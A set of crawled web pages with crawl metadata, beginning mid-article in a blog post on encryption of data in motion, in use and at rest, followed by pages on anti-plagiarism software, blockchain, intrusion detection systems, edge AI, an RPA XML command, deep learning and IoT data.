- RSA (Rivest-Shamir-Adleman),
- ECC (Elliptic Curve Cryptography).
Asymmetric algorithms are not commonly used for encryption because they are slower. For example, the RSA algorithm requires keys between 1024 and 4096 bits, which slows down the encryption and decryption process.
These algorithms can be used, however, to encrypt symmetric algorithm keys when they are distributed.
A more common usage of asymmetric algorithms is digital signatures. They are mathematical algorithms that are used to cryptographically validate the authenticity and integrity of a message or media on the internet.
What is encryption used for?
Encryption ensures confidentiality of data. The unreadable ciphertext keeps the data private from all parties that do not possess the decryption key.
Data has three states:
- In motion,
- In use,
- At rest.
It is essential to understand these states and ensure that the data is always encrypted. It is not enough to encrypt data only when it is stored if, when in transit, a malicious party can still read it.
Therefore, we will look at encryption mechanisms for all three data states.
In Motion Encryption
Data in motion, or in transit, is data that is moved from one location to another, for example, between:
- virtual machines,
Examples of data in motion are:
Data in motion can be encrypted using SSL/TLS. TLS (Transport Layer Security) and SSL (Secure Sockets Layer) are transport layer protocols that protect the data in transit. TLS is a newer and improved version of SSL.
SSL/TLS ensure confidentiality through encryption. Firstly, a session is created between the two parties exchanging a message using asymmetric encryption. Then, after the secure session is established, symmetric algorithms are used to encrypt the data in motion.
Using one of the mentioned protocols prevents attackers from reading the data in motion.
Websites should use HTTPS (Hypertext Transfer Protocol Secure) instead of HTTP to ensure encryption between websites and browsers. HTTPS uses SSL/TLS.
What is in motion data vulnerable to?
Eavesdropping attacks. In this situation, malicious entities can analyze traffic sent over the internet and read unencrypted data.
In Use Encryption
Data currently accessed and used is considered in use.
Examples of in use data are:
- files that are currently open,
- RAM data.
Because data needs to be decrypted to become in use, it is essential that data security is taken care of before the actual use of data begins.
To do this, you need to ensure a good authentication mechanism. Technologies like Single Sign-On (SSO) and Multi-Factor Authentication (MFA) can be implemented to increase security.
Moreover, after a user authenticates, access management is necessary. Users should not be allowed to access any available resources, only the ones they need to, in order to perform their job.
A method of encryption for data in use is Secure Encrypted Virtualization (SEV). It requires specialized hardware, and it encrypts RAM memory using an AES-128 encryption engine and an AMD EPYC processor. Other hardware vendors are also offering memory encryption for data in use, but this area is still relatively new.
What is in use data vulnerable to?
In use data is vulnerable to authentication attacks. These types of attacks are used to gain access to the data by bypassing authentication, brute-forcing or obtaining credentials, and others.
Another type of attack for data in use is a cold boot attack. Even though the RAM memory is considered volatile, after a computer is turned off, it takes a few minutes for that memory to be erased. If kept at low temperatures, RAM memory can be extracted, and, therefore, the last data loaded in the RAM memory can be read.
At Rest Encryption
Once data arrives at the destination and is not used, it becomes at rest.
Examples of data at rest are:
- cloud storage assets such as buckets,
- files and file archives,
- USB drives, and others.
This data state is usually most targeted by attackers who attempt to read databases, steal files stored on the computer, obtain USB drives, and others.
Encryption of data at rest is fairly simple and is usually done using symmetric algorithms. When you perform at rest data encryption, you need to ensure you’re following these best practices:
- you're using an industry-standard algorithm such as AES,
- you’re using the recommended key size,
- you’re managing your cryptographic keys properly by not storing your key in the same place and changing it regularly,
- the key-generating algorithms used to obtain the new key each time are random enough.
For the examples of data given above, you can have the following encryption schemes:
- full disk encryption,
- database encryption,
- file system encryption,
- cloud assets encryption.
One important aspect of encryption is cryptographic keys management. You must store your keys safely to ensure confidentiality of your data.
You can store keys in Hardware Security Modules (HSM), which are dedicated hardware devices for key management. They are hardened against malware or other types of attacks.
Another secure solution is storing keys in the cloud, using services such as:
- Azure Key Vault,
- AWS Key Management Service (AWS KMS),
- Cloud Key Management Service in GCP.
What is at rest data vulnerable to?
Although data at rest is the easiest to secure out of all three states, it is usually the point of focus for attackers. There are a few types of attacks data in transit is vulnerable to:
- Exfiltration attacks. The most common way at rest data is compromised is through exfiltration attacks, which means that hackers try to steal that data. For this reason, implementing a very robust encryption scheme is important.
Another essential thing to note is that, when data is exfiltrated, even if it is encrypted, attackers can try to brute-force cryptographic keys offline for a long period of time. Therefore a long, random encryption key should be used (and rotated regularly).
- Hardware attacks. If a person loses their laptop, phone, or USB drive and the data stored on them is not encrypted (and the devices are not protected by passwords or have weak passwords), the individual who found the device can read its contents.
Are you protecting data in all states?
Use Cyscale to ensure that you’re protecting data by taking advantage of over 400 controls.
Here are just a few examples of controls that ensure data security through encryption across different cloud vendors:
- Ensure all S3 buckets employ encryption-at-rest for AWS
- Ensure web app is using the latest version of TLS encryption for Azure
- Ensure VM disks for critical VMs are encrypted with Customer-Supplied Encryption Keys (CSEK) for GCP
- Ensure server-side encryption is set to 'Encrypt with Service Key' for Alibaba
Build and maintain a strong
Security Program from the start.
Share this article
Receive new blog posts and product updates from Cyscale
|
<urn:uuid:5f23398e-672f-4588-9378-bfa9b17667ba>
|
CC-MAIN-2022-40
|
https://cyscale.com/blog/types-of-encryption/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337625.5/warc/CC-MAIN-20221005105356-20221005135356-00447.warc.gz
|
en
| 0.898676 | 1,781 | 4 | 4 |
Plagiarism is nothing new for educators. For as long as there have been essays, there have been students looking to cheat their way out of having to write them. In the past that typically meant copying information out of encyclopedias and other reference materials. With the massive amount of media outlets and online sources available to them, today’s students have more opportunities than ever before to plagiarize. As the internet has grown, universities have seen more instances of plagiarism. In fact, 55 percent of college presidents have said the number of plagiarized essays on their campuses has increased over the last decade. Eighty-nine percent said personal computers and the internet have played a major role in the trend.
With more universities using online course resources, it can be difficult for professors to be sure that the papers their students are writing are original. Many have been forced to take it upon themselves to scour the internet searching for proof to find out whether suspicious papers have indeed been plagiarized. Needless to say, that is an arduous process, with teachers entering passages into search engines and waiting to see if anything turns up.
Keeping students honest in the classroom
In the classroom, one way for teachers to prevent students from copying others’ work is with computer monitoring software, which allows instructors to view student monitors and track their web browsing in real-time. If a student begins copying and pasting passages from an online resource, the professor will know right away.
Out of class, things can get a bit trickier. Students are free to access whatever sites they please without being monitored. There is little professors can do at this point to prevent plagiarism, but there are tools available to help them identify plagiarized essays.
Brevard Community College in Cocoa, Florida, has begun using software that analyzes electronically-submitted essays. By comparing the content of a student’s paper against its text database, the program can determine how much of the material was copied.
At first, schools that implemented the software found that instances of plagiarism actually increased on campus, because teachers were better able to identify stolen material. Once the program’s existence became common knowledge, plagiarism rates plummeted. In addition to keeping students honest, the software has freed up time for instructors as they no longer have to go to great lengths to identify plagiarism. With these software tools at their disposal, college professors can be sure that their students are producing original work.
Do you think enough is being done to prevent plagiarism? Would you like to see more universities install anti-plagiarism software? Tell us what you think in the comments section below or message us directly on Facebook!
|
<urn:uuid:373d70b0-b502-46c1-b9cf-5f7e52720294>
|
CC-MAIN-2022-40
|
https://www.faronics.com/news/blog/software-helps-crack-down-on-plagiarism
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337625.5/warc/CC-MAIN-20221005105356-20221005135356-00447.warc.gz
|
en
| 0.959598 | 545 | 3.203125 | 3 |
Share this post:
Let’s be honest with each other. How many of you still believe that blockchain technology is Bitcoin? Or that it’s only applicable for cryptocurrency? Well, blockchain has become so much more. The most popular misconception is that Bitcoin equals blockchain. When Bitcoin was the only blockchain, there wasn’t much distinction between the terms. As the technology matured, use cases quickly diverged beyond the pure monetary aspect. Another myth is that blockchain is only relevant to the FinTech industry. Blockchain technology can be applied and has been applied to many different industries.
Interestingly, there are still several misconceptions floating around about blockchain. Perhaps this is not too surprising since it’s still considered a relatively new technology. While the concept for blockchain was born nearly 30 years ago by cryptographers Stuart Haber and W. Scott Stornetta, The Linux Foundation’s Hyperledger Project in 2016 really set the wheels in motion for the beginning of enterprise blockchain.
Leverage the IBM Blockchain Ecosystem for new opportunities
By establishing the umbrella project of open source blockchains and tools, innovators began creating open, standardized and enterprise-grade distributed ledger blockchain frameworks and code bases to produce tangible business results across multiple industries: in finance, banking, healthcare, IoT, supply chain, manufacturing and other industries.
Put your fears aside
“The only way to lead in today’s ever-changing marketplace, is to constantly innovate according to what our clients want and need.” – Arvind Krishna, IBM CEO
When the internet was invented, it was revolutionary in the way it changed how people, businesses and governments operate. Blockchain is doing for business what the internet did for communication. Whenever new technologies get introduced, people rightfully have many questions, plenty of curiosity, and sometimes misconceptions about what is real, and what is possible. Blockchain is undoubtedly a subject of much conversation as with other emerging technologies.
The advancement of technology generally evokes a range of emotions in people, particularly trepidation. However, to stay on the cutting edge, it is a good time for companies to assess where they are, set new goals, change old habits and try new things. It is essential to stay relevant and current.
Ginni Rometty, IBM Executive Chairman has always said, “Growth and comfort do not coexist.” If you don’t get out of your comfort zone, and if you aren’t learning and taking risks, you won’t grow. You’ll stay right where you are. You need to adapt, you need to change, you need to keep learning.
This is where Business Partners come in
I’ve been working with Business Partners, a variety of solution providers, for over 20 years. As trusted advisors, your clients count on you to help them navigate new waters. They view you as vendor-agnostic, ready to bring forward the best technology solutions to keep their companies efficient and profitable.
While many technology solution providers (TSPs) aim to be early adopters, there are many of you who have expressed to me that blockchain seems to be just too hard. I’ve heard questions and perceptions such as these:
Do you need an advanced degree to work with blockchain?
False. To build on or use blockchain technology an advanced degree in cryptography is not necessary. Many tools exist to assist in leveraging the technology and several blockchains allow you to develop applications in most any coding language.
Isn’t blockchain really just a database?
Every blockchain may be considered a database, but every database cannot be considered a blockchain. Blockchain is like a database because it is a digital ledger that stores information in data structures called blocks. A database can be modified by a single user, but a blockchain is a shared ledger that is immutable for all participants in a transaction. Each block of information contains hash code to provide cryptographic security.
Different ways to engage and accelerate your business
It is vital to ensure you are educated on the different ways you can work with blockchain. Business Partners can:
- Build your own branded blockchain solution on IBM Blockchain Platform
- Build a network for your clients
- Establish your blockchain solution with either a software or SaaS implementation
- Drive a client to an existing network
These options and sample use cases can be found on our ecosystem page for Blockchain Partners.
Join us for a helpful webinar
Join us for our Blockchain Mythbusters webinar. Let us de-bunk the myths and clear the air on what is myth versus fact, what blockchain can or cannot do, and provide you with information on how you and your clients can reap the benefits and efficiencies that an IBM Blockchain solution provides.
Learn about the anatomy of a blockchain solution and the different ways you can leverage your existing skills. For our Business Partners out there, we want to help you get started, and we look forward to working with you.
Hear Blockchain Mythbusters and discover new opportunities with blockchain
|
<urn:uuid:7953c89d-b30a-413b-a745-e2e866696858>
|
CC-MAIN-2022-40
|
https://www.ibm.com/blogs/blockchain/2020/05/mythbusters-for-business-partners-blockchain-facts-or-fiction/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337625.5/warc/CC-MAIN-20221005105356-20221005135356-00447.warc.gz
|
en
| 0.938377 | 1,026 | 2.578125 | 3 |
Sustainable Tech: 5 IT Giants Lowering Their Carbon Footprint
From slashing carbon emissions to renewable energy investments and responsible water usage, here’s what five IT leaders are doing right now to combat climate change.
AT&T Intros Initiative To Reduce U.S Carbon Emissions
Telecom giant AT&T in August launched its Connected Climate initiative aimed at reducing carbon emissions in partnership with energy companies, fellow tech companies, and researchers.
The goal is for AT&T to help businesses reduce greenhouse emissions by 1 billion metric tons — 1 gigaton — by 2035. A gigaton is equal to approximately 15 percent of U.S. greenhouse gas emissions and nearly 3 percent of global energy-related emissions generated in 2020, according to the Dallas-based telecom. The initiative will push enterprise IT teams to rely more on renewable energy sources, especially as more companies move applications into the cloud.
Companies that have signed on to AT&T’s Connected Climate pledge include Microsoft, Equinix, Duke Energy, Texas A&M University System, and The University of Missouri.
|
<urn:uuid:04cb5cec-d483-49ab-985f-66079b5259f1>
|
CC-MAIN-2022-40
|
https://www.crn.com/slide-shows/networking/sustainable-tech-5-it-giants-lowering-their-carbon-footprint/2
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030333541.98/warc/CC-MAIN-20220924213650-20220925003650-00647.warc.gz
|
en
| 0.920148 | 238 | 2.609375 | 3 |
July 25, 2019
What Is an Intrusion Detection System?
An intrusion is any activity that is designed to compromise your data security. This can be through more menacing and pervasive formats like ransomware or unintentional data breaches by employees or others connected to your network.
An intrusion may include any of the following:
- Malware or ransomware
- Attempts to gain unauthorized access to a system
- DDOS attacks
- Cyber-enabled equipment destruction
- Accidental employee security breaches (like moving a secure file into a shared folder)
- Untrustworthy users –– both team members and those outside of your organization
- Social engineering attacks –– such as phishing campaigns and other ways of tricking users with seemingly legitimate communication
There are hundreds of ways that your MSP clients can experience data insecurity through an intrusion. There are much fewer methods for ensuring data safety with confidence and dependability. One trusted data security solution for MSPs is using an intrusion detection system.
What is an intrusion detection system?
Imagine you’re a security expert tasked with monitoring public safety for a metropolitan city’s large event. You can accomplish this in several different ways. You would likely have an aerial view and officers scattered throughout the event, scanning nearby groups, and assessing each person’s level of threat from close up. You would be wise to hire security experts who know what to look for based on their experience with known attackers who can flag behavior others may not notice.
This is, essentially, what your intrusion detection system (IDS) does day after day with your data packets, monitoring traffic to keep your network safe and secure from threats.
These are the three main types of intrusion detection systems:
- A network intrusion detection system (NIDS) is a security expert who has seen it all. It compares the data on your network to known attacks on an entire subnet and flags any suspicious traffic.
- A network node intrusion detection system (NNIDS) works similarly to the NIDS, except on a micro level. It checks each node connected to the network for threats and malicious activity. NNIDS is the security guard checking bags of each person walking into the event.
- A host intrusion detection system (HIDS) is the eye in the sky, checking on the whole event. A HIDS examines all of the system’s nodes and hosts to gather a more complete picture and then runs security checks for malicious activity based on that entire picture. Some security experts suggest that this type of IDS is the most effective as it can detect threats that originate within the network as well as external threats.
These are the types of intrusion detection system that MSPs can expect their clients to ask about, or at least that MSPs should know at a cursory level. Clients may not understand how a firewall works alongside an intrusion detection system. Learn why they need both.
Firewall security versus intrusion detection techniques
Your MSP clients need a firewall, a barricade keeping blatant malicious activity from entering your network. Of course, network attacks are becoming more sophisticated and occasionally occur from within your network, and that requires a higher level of scrutiny for each data packet traversing your network. Within intrusion detection systems there are two intrusion detection techniques: either noting suspicious activity or requiring strict security clearance for network entrance.
Here are the two intrusion detection techniques explained:
- Signature-based intrusion detection: As long as your network has a reliable database of stored signatures, checking packets against signatures (known identity) will keep your network safe. On the downside, signature-based IDS will cost your clients in CPU when using advanced signatures, which are better because they’re harder to falsify.
- Anomaly-based intrusion detection: One of the most important benefits of an anomaly-based IDS is its ability to detect the precursors to attacks: sweeps and probes toward network hardware. It also looks for anything out of the ordinary, within the network and from outside of it. The cons of an anomaly-based IDS are the cost of setup and requirement of connection to a security operation center. Because it is more comprehensive, it requires a bit more involvement. It is also arguably more effective than a signature-based IDS.
Intrusion detection vs. intrusion prevention
An IDS is the first line of defense –– detecting threats. Now, it’s time to bring in the S.W.A.T. team and neutralize the threat. Intrusion prevention systems are typically paired with an intrusion detection system to create the ultimate tool in threat detection and prevention. An intrusion detection and prevention system, like the one in the Datto Networking Appliance (DNA), detects threats and uses deep packet inspection features to detect and prevent intrusions in your and your clients’ networks.
With growing threats and more entry points than ever, your MSP’s network security features need to be robust and proactive.
Learn how to bolster your MSP’s network security offering with Datto’s MSP security toolkit, Ransomware Made MSPeasy.
|
<urn:uuid:a3a8cf43-58b2-492b-8ef7-f9a6cefe66ea>
|
CC-MAIN-2022-40
|
https://www.datto.com/blog/what-is-an-intrusion-detection-system
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030333541.98/warc/CC-MAIN-20220924213650-20220925003650-00647.warc.gz
|
en
| 0.933955 | 1,048 | 2.875 | 3 |
Even though edge computing is being talked almost hand in hand with edge AI, what is behind the term and what role does edge AI play in this broader edge computing ecosystem?
Edge AI refers to the deployment of AI applications in or near the smart or constrained device edge, terms which both describe where computing is done and the characteristics of the devices. As with edge computing, edge AI brings computation closer to the source where data is generated. Organizations exploring business opportunities by employing AI-based projects, edge AI improves the processes, efficiency and security for the data.
Among the many uses of edge AI, performing computer vision (including facial recognition) at the edge can enable workers to access machine functions that they are trained for, as well as aiding in workplace safety..
Technological breakthroughs in deploying AI models at the edge have brought in innovative strategies for designing power-efficient AI models that can be scaled in IoT edge devices. Traditionally, machine learning models were trained before the deployment of the neural networks in edge devices. However, with new edge AI models coming to light, developers can use efficient models that can re-train themselves while processing the new incoming data — making them more intelligent than ever before.
There is an emerging trend for federated learning and training machine learning models at the edge to maintain data privacy and security. Deploying AI at the edge offers benefits to the users as well as developers by offering a different model for security and privacy. Processing the incoming sensor data on or close to the data source (for example, in facial recognition, where the face is the ‘data) means personally identifiable information analyzed locally than relying being sent across the internet to a central cloud. The reduced cost of sending data and lower latency for processing are added bonuses.
Another emerging trend at the constrained device edge is deploying ML inference models in microcontroller-based resources like the smart speakers (Alexa). For uses where there is more power available, AI-specific chips are being used. For example, for autonomous vehicles to do object detection, AI accelerators can be integrated inside edge devices that are responsible for AI inference. In some cases where the deployed AI models encounter errors or anomalies in the data, the data can be transferred to the cloud facility for training on the original AI model. This feedback mechanism makes edge AI smarter and faster than traditional AI applications.
Some of the common examples where edge AI has become an essential technology and backbone for industries include manufacturing, healthcare, financial services, transportation, and many more.
AI/ML | Alexa | autonomous vehicles | computer vision | edge AI | facial recognition | Industry 4.0 | inference | model training | Smart Devices | TinyML
|
<urn:uuid:68778348-4379-40ee-820d-3a2d97c326c7>
|
CC-MAIN-2022-40
|
https://www.edgeir.com/what-is-edge-ai-and-what-is-it-used-for-20220328
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030333541.98/warc/CC-MAIN-20220924213650-20220925003650-00647.warc.gz
|
en
| 0.925876 | 541 | 3.40625 | 3 |
Use the XML command to process XML information that is generated from web services and cloud computing applications.
The XML command supports sessions, node editing, and Xpath expression execution, based on a tree structure of an XML document. The command enables the automated TaskBot / MetaBot Logic to navigate the tree and make selections based on various criteria.
The XML command enables users to capture data that has XML formatting and save it to a specified location.
To learn more, search for the Automating Structured Data: How to Work with XML Streams and Automating Tasks Using the XML Command courses in Automation Anywhere University: RPA Training and Certification (A-People login required).
- Start XML Session
- Specifies the session name and data source (a file or text).
- End XML Session
- Complements the Start XML Session operation by closing an open XML session.
- Insert Node
- Specifies node name and value. The location of the node is based on the position of the XPath Expression.
- Specifies action if node name is present (Insert It Anyways, Skip It, or Overwrite It) and where to insert node location (Beginning, End, Before Specific child node, or After Specific child node.
Note: If Before Specific child node or After Specific child node is selected, specify child node name.
- In the XML command, when
you insert a node into the XML file,
DefaultNSPrefixis no longer added. In the Advanced view tab of the Insert Node command, xmlns (default XML namespace) is not allowed either as a prefix or as an attribute. You can enable the
DefaultNSPrefixmanually by setting the value of
truein the AA.settings file in .Note: If
DefaultNSPrefixis enabled and the value of
allowaddingdefaultnamespaceis set as
true, you might encounter an issue. When you insert or update a new node as an empty node, a newline character will be added, and indentation will not be maintained.
- Delete Node/Attribute
- Deletes a node or attribute from the XML file by specifying the XPath Expression.
- Update Nodes
- Updates nodes in a session at the position that is specified for the XPath Expression.
- Update Attributes: Mark the check box to add, update, or delete attributes.
- Validate XML Document
Validates session data using XML schema files (.xsd), internal Document Type Definitions (DTDs), or if the session data is Well Formed.
Validation output (VALID or INVALID) can be assigned to a variable. If an error occurs during validation, it is stored in the system variables named: $Error Line Number$ and $Error Description$.
- Get Node(s)
- Retrieves the value(s) of a single or multiple node(s) in the session data by
specifying the XPath Expression.
- Get Single Node: Retrieves the value of a single node or attribute from the session data, at the position specified in the XPath expression. The value is assigned to a variable.
- Get Multiple Nodes: Retrieves values from multiple nodes in the session data, using Text value/XPath expression/Specified attribute name, based on the specified XPath expression.
- The value is assigned to a system variable named $XML Data Node (Node name)$, which can be used in conjunction with a LOOP command. For example, a Loop command can be used to search each node in an XML data set.
- Save Session Data
- Saves the session data to a variable.
- Write XML Data: Mark the check box to save the data to a
The data is saved in an XML file encoded in UTF-8 format.
- Execute XPath Function
- Executes an XPath function and stores the results in a variable.
|
<urn:uuid:0d2349a0-72b9-4d1e-8465-f48ad782937c>
|
CC-MAIN-2022-40
|
https://docs.automationanywhere.com/fr-FR/bundle/enterprise-v11.3/page/enterprise/topics/aae-client/bot-creator/commands/xml-command.html
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335034.61/warc/CC-MAIN-20220927131111-20220927161111-00647.warc.gz
|
en
| 0.702494 | 839 | 2.609375 | 3 |
In the broad sense, Artificial Intelligence (AI) refers to the capability of machines to imitate intelligent human behavior. As such, Artificial Intelligence systems process large amounts of observations in order to learn how to confront complex problems. During the last couple of years there is surge of interest on Artificial Intelligence problems and applications in a variety of different sectors such as transport, healthcare and industry. This interest is largely due to development and deployment of advanced AI systems that can win grandmasters in the GO game or reason over complex driving contexts to enable autonomous vehicles.
The development of such advanced systems has been enabled by the evolution of computing and storage, which facilitates their training on very large datasets and the very fast execution of their algorithms. Most of these advanced systems take advantage of deep learning, which is a special segment of machine learning that leverages deep neural networks i.e. neural networks with many hidden layers. Deep neural networks can identify complex and unusual patterns of knowledge, far beyond classical machine learning algorithms. For example, convolutional neural networks (CNN) can detect and analyze very complex patterns in visual imagery. CNNs are inspired by biological processes, since they connect their neurons in a way much similar to the organization of animal’s visual cortex. As another example of deep learning techniques, Recurrent Neural Networks (RNN) are appropriate for analyzing temporal behavior dynamics since they use their internal state (i.e. their memory) to process entire sequences of different inputs. This makes them more appropriate for artificial intelligence problems like handwriting recognition and speech processing. Overall, deep neural networks tackle some very challenging artificial intelligence problems i.e. problems that typically require human like intelligence. Following paragraphs present some of the most popular of these problems.
Image colorization is a challenging artificial intelligence problem of adding colors to black and white (B/W) photographs. This is typically a task undertaken by humans and is the foundation for many interesting projects like the revival and relaunch of classical BW films. Deep learning techniques based on convolutional neural networks are nowadays able to deal with the colorization problem. CNNs are efficient in identifying the boundaries of objects in the image. However, in the colorization case this is not enough. Rather, there is a need to recreate the image with the addition of color to the various objects. This is achieved based on the use of very large convolutional neural networks with supervised layers. The latter leverage images and libraries developed over the popular ImageNet database for the problem of automatic colorization.
Another challenging task solved based on deep learning involves sound synthesis for silent videos. The process is based on the development of a deep learning model that associates silent video frames with pre-recorded sounds that match the scenes that are displayed in them. The model takes advantage of a large number of video examples with sounds that comprise scenes similar to the ones contained in the silent video. For example, when the silent video clip depicts an object being hit, the deep learning algorithm produces a sound that is both relevant and realistic enough to fool human viewers. Indeed, similar systems have been evaluated with the participation of human actors, who were unable to determine which video clips comprise real sounds and which ones are synthesized. The system employs a combination of convolutional neural networks and recurrent neural networks, as a means of alleviating the limitations of early stage neural networks.
In addition to “giving life” to silent movies, such deep learning models are expected to open new horizons in media, where they can be used to automatically produce sound effects in movies and TV shows. They will also advance the perceptive capabilities of robots, which will be able to use sound similarity metrics in order to understand object’scontext and properties.
There are also many applications that take advantage of multi-media content retrieval (e.g., object search in images) instead of conventional textual search. One of the main tasks in such artificial intelligence problems concerns the classification of objects within a photograph or image based on a set of previously known objects. Very large CNNs have been recently proven very efficient in object classification. Likewise, they are also used for a variation of this problem, namely the task of object detection, which is even closer to content based retrieval. Object detection is foundational for a great number of applications from security to autonomous cars. It is what we usually see in the scope of images where boxes are drawn around a wide array of detected objects.
How about computers and devices that can write like humans? This is no longer science fiction as there are deep learning solutions to automatically generate handwriting based on a corpus of handwriting samples that are used for training. In particular, the deep learning solutions uses the corpus in order to learn the relationship between the pen movement and the letters produced based on this movement. Following this learning, the deep learning system is able to generate new handwriting data. Note that available systems can be trained to produce different writing styles.
Nowadays most of us have used at least once automatic machine translation systems, which translate words, phrases and sentences from one language to another without any human intervention. Automatic machine translation systems have been around for nearly two decades. However, recent advances in deep learning have significantly improved the effectiveness of automatic translation of text and of automatic translation of images. In particular, modern deep learning models based on a very large RNNs can perform text translation without any preprocessing of the words’ sequence, as they can learn the dependencies between the words and their mapping to a new language. Likewise, CNNs can be used to process images that contain letters. Accordingly, letters are converted to text, the text is translated and new images containing the translated text are recreated. The entire process is much more efficient and accurate than in the past thanks to the availability of large corpora of training data in the target languages. Training data availability is key to success: In most cases it’s even more important than having an effective deep learning model or algorithm. Hence, limited training data is usually one of the main limitations of deep learning systems.
The above use cases are probably only the starting point of applying deep learning for artificial intelligence problems based on systems that exhibit human like intelligence. Nevertheless, the presented use cases are indicative of the advanced capabilities offered by deep neural networks. By combining several of the presented capabilities more complex and more interesting use cases will be made possible, such as for example autonomous driving which involves the continuous detection of objects on video in order to understand and anticipate the driving context. Such use cases combine multiple neural networks in order to alleviate the limitations of simple deep learning systems. By and large, when it comes to thinking of the possibilities that are opened up by deep learning, the only limit is the sky.
The Cybersecurity Challenge for Deep Learning Systems
Deep Learning: Let’s Dig Deeper!
Predictive Maintenance: Can machines foretell their lifetime?
Deliver personalized experiences to improve customer engagement using machine learning
Keeping ML models on track with greater safety and predictability
Significance of Customer Involvement in Agile Methodology
Quantum Computing for Business – Hype or Opportunity?
The emerging role of Autonomic Systems for Advanced IT Service Management
Why is Data Fabric gaining traction in Enterprise Data Management?
How Metaverse could change the business landscape
We're here to help!
No obligation quotes in 48 hours. Teams setup within 2 weeks.
If you are a Service Provider looking to register, please fill out this Information Request and someone will get in touch.
Outsource with Confidence to high quality Service Providers.
If you are a Service Provider looking to register, please fill out
this Information Request and someone will get in
Enter your email id and we'll send a link to reset your password to the address
we have for your account.
The IT Exchange service provider network is exclusive and by-invite. There is
no cost to get on-board;
if you are competent in your areas of focus, then you are welcome. As a part of this exclusive
|
<urn:uuid:a1e59819-5b82-449b-9984-b8d40f54e600>
|
CC-MAIN-2022-40
|
https://www.itexchangeweb.com/blog/deep-learning-and-ai-popular-applications/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335286.15/warc/CC-MAIN-20220928212030-20220929002030-00647.warc.gz
|
en
| 0.942264 | 1,632 | 3.703125 | 4 |
The buzz generated by IoT and M2M is understandable because of the dizzying speeds with which developments have unfolded and the impact of events. In a world where digital transformation is influencing most areas of work and life, IoT and M2M have one of the most significant roles to play.
Moreover, powering IoT and M2M has been the deluge of data that seems to be flowing everywhere. This is to be expected considering that the number of connected devices has outnumbered the human population, with connected devices set to witness explosive growth over the years. This brings us back to the role of data in IoT application development and M2M.
Decoding the Role of Data
Data typically performs the following tasks/functions in an application.
- Generate data
- Collate information
- Analyse the collated information
- Learn from patterns
- Take decisions independently
A device/application typically generates data by sensing and collecting data, analyses the same to create a reference, predicts response by stored patterns and takes a decision independently with available inputs.
The Fundamental Difference between M2M and IoT
M2M and IoT have been used interchangeably to refer to systems that may appear to operate in a similar process. However, there is a fundamental difference between the two, which makes the interchangeable use erroneous.
[bctt tweet=”M2M is more of a vertical application which meets internal demands, whereas IoT can be considered as one with overarching results or one with open-ended capabilities.” username=”iotforall”]
M2M communications, true to its name, refers to interactions between machines, with operators having access to inputs for re-configuring machines. IoT refers to machines that are connected to the internet, which will offer data to customers or clients which can be used for monitoring purposes and for taking decisions by the shared information. An IoT is more of development over M2M systems.
Role of Data in the Different Ecosystems of M2M and IoT
M2M is more of a vertical application which meets internal demands, whereas IoT can be considered as one with overarching results or one with open-ended capabilities.
Consequently, data is different and its use is different in IoT application development from M2M. The information that moves between machines has evolved considerably and with its convergence with AI, is bound to offer higher value to users. Data in IoT applications will find a more excellent use of analytics in the future, as developments make it possible for video analytics to empower machines to trigger responses and event-driven actions.
The role of data has grown exponentially and as a proportion to the large volumes of data that is now being exchanged over networks. One of enables of this evolved communication is the ability of machines and devices to communicate across different communication standards. This ability to transfer information across different spectrum/connectivity options has reduced the latency levels, which permit real-time actions and responses.
Collation of Data from Virtually Unlimited Numbers of Connected Devices
At present, it is possible for IoT networks to collate data from almost unlimited amounts of connected devices across remote locations. One of the most common and immensely useful examples of Applications are GPS enabled navigation with inputs on traffic congestion. It is hard to imagine getting to some new place without a GPS navigation system that offers data on traffic congestion and re-routes the user through an alternate destination.
This makes use of inputs from multiple devices and intelligent analytics of the speed of the vehicular movement to understand if the congestion is normal or highly abnormal. Similarly, usage of products to predict requirements and understand customer behavior is being used effectively to boost sales and trigger actions in supply chains. The Applications are growing by the minute as IoT application development are gradually spreading to various domains.
Data Used for Industrial Automation in Combination with Other Technologies
IoT is a natural bedfellow with multiple technologies. Consequently, it finds widespread use as a combination with other techniques to offer solutions in the industry. Automation in the sector is one such area where data through IoT platforms helps unify communication across assembly lines.
The exchange of data between machines and over the internet helps automate processes. Depending on the requirement, assembly lines will either speed up or slow down the processes or change the presentation of products.
The health of machines/assets can be monitored on a real-time basis. For instance, tractors on the field can communicate with the services centers and update technicians about the working condition or efficiency and the need for replacement of parts before the end of the duty cycle. This prevents the need for users to experience downtime as a result of a component failure. This combination has found widespread use to promote preventive maintenance.
Data Exchange for Elder Care Through Wearable Technology
IoT in healthcare has been touted as one of the most significant areas of change that IoT can bring about. Care for the elderly through wearable technology is just one of the many different uses that can be experienced. The use of wearable devices gives real-time updates on health/condition of patients by monitoring vital signs or other parameters to identify a potential risk or manifestation.
This offers specific healthcare operations the ability to intervene in the shortest possible time that provides better outcomes. Remote monitoring of the health of patients will change the face of healthcare in developing countries, where a considerable gap exists between specialist medical professionals, facilities, and populations in remote locations.
Connected diagnostics where data transmits parameters at predetermined times or when threshold values are crossed offer the hope to patients globally.
IoT and M2M will continue to change the quality of life and the workplace. As organizations take the plunge into operations that are automated, with repetitive tasks being taken over by machines, it will be all the more critical for IoT to work as a grid to connect all aspects seamlessly.
Data will play the single most significant role in effectively communicating between devices and the internet or machines, transmitting crucial information. Without data IoT and M2M will find no purpose, as the devices are a conduit for the data which is part of the solution.
Written by Nasrullah Patel, Co-founder at Peerbits
|
<urn:uuid:e0a298c4-cd64-4acf-ac08-d16eb698dbd3>
|
CC-MAIN-2022-40
|
https://www.iotforall.com/data-in-iot-m2m
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336674.94/warc/CC-MAIN-20221001132802-20221001162802-00647.warc.gz
|
en
| 0.939731 | 1,253 | 2.8125 | 3 |
